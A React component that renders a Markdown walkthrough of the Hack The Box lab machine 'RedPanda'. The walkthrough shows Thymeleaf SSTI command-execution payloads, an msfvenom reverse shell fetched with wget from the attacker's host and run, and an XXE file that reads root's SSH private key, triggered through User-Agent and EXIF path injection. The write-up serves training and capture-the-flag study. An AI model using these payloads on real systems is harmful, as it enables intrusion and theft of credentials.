import ReactMarkdown from 'react-markdown'
import remarkGfm from 'remark-gfm'
import {Prism as SyntaxHighlighter} from 'react-syntax-highlighter'
import {dracula} from 'react-syntax-highlighter/dist/esm/styles/prism'
import './htb.css'

const markdown = `
### Machine IP: 10.10.11.170

![](/writeups/RedPanda/redpanda_banner.png)

Author: Arman
- https://github.com/ArmanHZ
- https://app.hackthebox.com/profile/318304

---
### Initial Enumeration
As always, we start with \`nmap\`.

\`\`\`bash
mkdir nmap
nmap -sC -sV -v -oN nmap/initial_scan 10.10.11.170
\`\`\`

There are only 2 ports open:

\`\`\`text
PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)
|   256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
|_  256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
8080/tcp open  http-proxy
|_http-title: Red Panda Search | Made with Spring Boot
\`\`\`

There are also \`HTTP\` related outputs. However, 2 ports seem a bit odd so we should also do an all ports \`nmap\` scan.

\`\`\`bash
nmap -p- -v -oN nmap/all_ports 10.10.11.170
\`\`\`

And we still get 2 ports open. So we definitely have only 2 ports open.

Let us check out the web service running on port \`8080\`.

---
### Enumerating the web service
From the \`nmap\` scan, we get the string \`Made with Spring Boot\`. This tells us that we are dealing with a \`Java\` server. We should keep this in mind.

Before running any directory brute force, we should checkout what the web page has to offer.

Navigating to \`http://10.10.11.170:8080/\` we get the following page:

![](/writeups/RedPanda/website_1.png)

There is a search bar at the bottom. If we use it without providing any input, we will be redirected to \`http://10.10.11.170:8080/search\`

![](/writeups/RedPanda/website_2.png)

Here we get some hints about the attack. We have to do some sort of injection. Googling java, spring-boot and injection types, we find the following blog: https://www.acunetix.com/blog/web-security-zone/exploiting-ssti-in-thymeleaf/

Trying injection with \`$ {7*7}\`, we get the following (no space between dollar sign and brackets):

![](/writeups/RedPanda/banned_char.png)

Following the blog, we can try other characters:

\`\`\`text
*, #, @ and \`
\`\`\`

Trying \`*{7*7}\`, we get:

![](/writeups/RedPanda/injection_0.png)

So, we have successful SSTI injection.

---
### Exploiting SSTI
We can use the following tool's syntax: https://github.com/VikasVarshney/ssti-payload

However, we do not need to append chars. So, we have to make some changes to the tool's syntax. Also we need to use \`*\`.

Trying the following command:

\`\`\`java
*{T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec('id').getInputStream())}
\`\`\`

![](/writeups/RedPanda/injection_1.png)

Good. We can execute commands. Now time for getting a reverse shell on the machine.

---
### Reverse shell
We will create a reverse shell \`elf\` file using \`msfvenom\`, then we will use \`wget\` with \`SSTI\` to download the reverse shell to the machine. Finally, we will use \`SSTI\` to execute the reverse shell.

Let us first create the reverse shell executable:

\`\`\`bash
msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.16.33 LPORT=9801 -f elf -o shell.bin
\`\`\`

Also, we need to create an \`http\` server to host the file:

\`\`\`bash
# shell.bin must be in the same directory the server is running
sudo python3 -m http.server 80
\`\`\`

And now we can upload the executable:

\`\`\`java
*{T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec('wget http://10.10.16.33/shell.bin').getInputStream())}
\`\`\`

![](/writeups/RedPanda/upload_shell.png)

I have used \`curl\` to send the request to show the \`http\` server hit. However, sending the request from the website also works.

Good. Now we have to listen to our reverse shell with \`netcat\` and execute the reverse shell with the following command:

\`\`\`bash
# Change the executable's permissions
*{T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec('chmod 777 shell.bin').getInputStream())}

# Execute
*{T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec('./shell.bin').getInputStream())}
\`\`\`

![](/writeups/RedPanda/reverse_shell.png)

---
### Enumerating user Woodenk
After stabilizing out shell, it is a good idea to find the \`java\` sources and check them out.

\`\`\`bash
export TERM=xterm-256color
python3 -c "import pty;pty.spawn('/bin/bash')"
reset
\`\`\`

Finding the \`java\` files:

\`\`\`bash
find / -type f -name '*.java' 2>/dev/null
\`\`\`

Output:

\`\`\`text
/opt/panda_search/.mvn/wrapper/MavenWrapperDownloader.java
/opt/panda_search/src/test/java/com/panda_search/htb/panda_search/PandaSearchApplicationTests.java
/opt/panda_search/src/main/java/com/panda_search/htb/panda_search/RequestInterceptor.java
/opt/panda_search/src/main/java/com/panda_search/htb/panda_search/MainController.java
/opt/panda_search/src/main/java/com/panda_search/htb/panda_search/PandaSearchApplication.java
/opt/credit-score/LogParser/final/.mvn/wrapper/MavenWrapperDownloader.java
/opt/credit-score/LogParser/final/src/test/java/com/logparser/AppTest.java
/opt/credit-score/LogParser/final/src/main/java/com/logparser/App.java
\`\`\`

So, there are two different apps. Let us start by looking at the \`panda_search\` one.

Looking at \`MainController.java\`, we find the following:

![](/writeups/RedPanda/java_file_0.png)

We got \`woodenk:RedPandazRule\` credentials for the database. We can also try these for logging into \`ssh\`.

---
### SSH and further enumeration (also the user flag which I forgot :D)
Luckily the database credentials also work for \`ssh\`.

\`\`\`bash
# ssh into the machine
ssh woodenk@10.10.11.170

# user.txt
cat $HOME/user.txt
\`\`\`

We can also check the contents of the database using the following command:

\`\`\`bash
mysql -u woodenk -p
\`\`\`

However, the database does not contain anything of importance.

We should also download the source files to our machine for further analysis. To do this we can utilize the \`scp\` command and download files through \`ssh\` connection. Or you can use \`python http\` server.

Looking around and analyzing stuff with \`linpeas\`, we do not find anything that we can use to elevate our privileges. So, the next step is to analyze the \`java\` files for a potential privilege escalation.

Furthermore when we run the command:

\`\`\`bash
ps -aux
\`\`\`

We find the following:

\`\`\`bash
root         880  0.0  0.0   2608   464 ?        Ss   Sep05   0:00 /bin/sh -c sudo -u woodenk -g logs java -jar /opt/panda_search/target/panda_search-0.0.1-SNAPSHOT.jar
root         881  0.0  0.1   9416  3684 ?        S    Sep05   0:00 sudo -u woodenk -g logs java -jar /opt/panda_search/target/panda_search-0.0.1-SNAPSHOT.jar
\`\`\`

---
### Analyzing the Java files
A lot of interesting things are in the \`logparser/App.java\` file.

Let us first take a look at the \`main\` function:

![](/writeups/RedPanda/code_01.png)

So, the \`main\` function reads a log file line by line and parses each line using the \`parseLog\` function. In order for the \`parseLog\` to be called, each read line must also pass the \`isImage\` function.
the \`String xmlPath\` reads the artist name from the \`getArtist\` function and finally the \`addViewTo\` function is called reading two parameters which are result of \`getArtist\` and \`parseLog\` functions.

Now let us analyze the functions one by one and see if we can inject anything.

First we have \`isImage\`:

![](/writeups/RedPanda/code_02.png)

This function simply checks if the filename contains \`.jpg\` extension. Easy to bypass.

Next, we gave \`parseLog\`:

![](/writeups/RedPanda/code_03.png)

This function returns a \`Map\` object and it creates the \`Map\` by splitting the string using \`||\`. So, we can potentially inject anything we want, since we have control of the \`user_agent\` of any request that we make.

Next, \`getArtist\`:

![](/writeups/RedPanda/code_04.png)

This function basically reads the \`Artist\` field of the \`jpg\` file. So this is also injectable.

![](/writeups/RedPanda/code_05.png)

This function creates an \`XML\` file with the given parameters. The structure of the \`XML\` file is given in the second \`if\` statement.
We basically have control of most of the parameters. This will be multi injection exploit, but ultimately we will be able to use \`XML\` to get the \`root.txt\` or if available the root's \`ssh key\`.

---
### Root
First we have to get any \`jpg\` file and edit it's \`Artist\` field to inject a path. We are doing this because we do not have access to the \`/credits\` folder which the final \`XML\` file will be created.
We can edit the \`Artist\` using \`exiftool\`:

\`\`\`bash
# We can write to /home/woodenk
exiftool -Artist='../home/woodenk/hax' pepe_cry.jpg
\`\`\`

Next we will create the \`XML\` file with the command injection:

\`\`\`xml
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE replace [<!ENTITY key SYSTEM "file:///root/.ssh/id_rsa"> ]>
<credits>
    <author>damian</author>
    <image>
        <uri>/../../../../../../../home/woodenk/pepe_cry.jpg</uri>
        <res>&key;</res>
        <views>0</views>
    </image>
    <totalviews>0</totalviews>
</credits>
\`\`\`

We will use the \`author\` name \`damian\` because of the following line in the \`MainController.java\` file:

![](/writeups/RedPanda/code_06.png)

Alternatively, we could use \`damian\` as well.
Finally we will name the \`XML\` file \`hax_creds.xml\`.

Now we will upload the \`XML\` and the \`jpg\` file to \`/home/woodenk\` and then make the following \`http\` request to trigger the parsing:

\`\`\`bash
curl 10.10.11.170:8080 -H "User-Agent:||/../../../../../../../home/woodenk/pepe_cry.jpg"
\`\`\`

![](/writeups/RedPanda/request_01.png)

After uploading the files and running the \`curl\` command, we need to wait and read the \`XML\` file. We can use the \`watch\` command to do that:

\`\`\`bash
watch cat hax_creds.xml
\`\`\`

![](/writeups/RedPanda/request_02.png)

After a while, we get the \`root\`'s private key.

We can now paste the content to a file and use it with ssh:

\`\`\`bash
ssh -i ssh-root-priv.key root@10.10.11.170
\`\`\`

![](/writeups/RedPanda/root.png)

And we are the root!
`
export default function RedPanda() {
  return (
    <div className='writeup-div'>
      <ReactMarkdown
      children={markdown}
      remarkPlugins={[remarkGfm]}
      components={{
        code({node, inline, className, children, ...props}) {
          const match = /language-(\w+)/.exec(className || '')
          return !inline && match ? (
            <>
              {/*
              // @ts-ignore */}
              <SyntaxHighlighter children={String(children).replace(/\n$/, '')} style={dracula} language={match[1]} PreTag="div" {...props} />
            </>
          ) : (
            <code className={className} {...props}>
              {children}
            </code>
          )
        }
      }}
      />
    </div>
  )
}
